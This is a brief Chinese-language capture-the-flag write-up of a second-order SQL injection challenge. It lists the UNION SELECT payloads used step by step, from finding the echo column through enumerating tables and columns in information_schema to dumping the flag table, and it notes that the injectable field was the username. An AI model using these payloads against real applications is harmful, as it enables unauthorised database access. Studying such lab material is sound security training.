October 2019 Twice SQL Injection

目录

首先，尝试一下回显位的个数

第二步获取数据库名称

第三步，获得表名

第四步，获得列名

最后获取flag

总结 ：二次注入，首先我们需要锁定是哪里哪个文本框存在二次注入，以这道题为例，首先我以为是登录进去的​编辑 

---

打开题目，注册登录，然后登录以后会有一个  

然后结合题目，妥妥的二次注入的题目呀

直接进行构造

首先，尝试一下回显位的个数

'union select 1,2#  没回显

'union select 1#         

 直接发现了回显位置

第二步获取数据库名称

' union select database() # 获得      

第三步，获得表名

1' union select group_concat(table_name) from information_schema.tables where database()=table_schema#

flag查询到了表名  flag,news,users

第四步，获得列名

1' union select group_concat(column_name) from information_schema.columns where table_name="flag" #

列名为：flag

最后获取flag

1' union select group_concat(flag) from flag#

 

总结 ：二次注入，首先我们需要锁定是哪里哪个文本框存在二次注入，以这道题为例，首先我以为是登录进去的 

首先我认为是这个登陆进去以后的，change这个文本框存在二次注入但是实验了以后发现它存在过滤，然后就继续寻找，最后找到了用户名这个。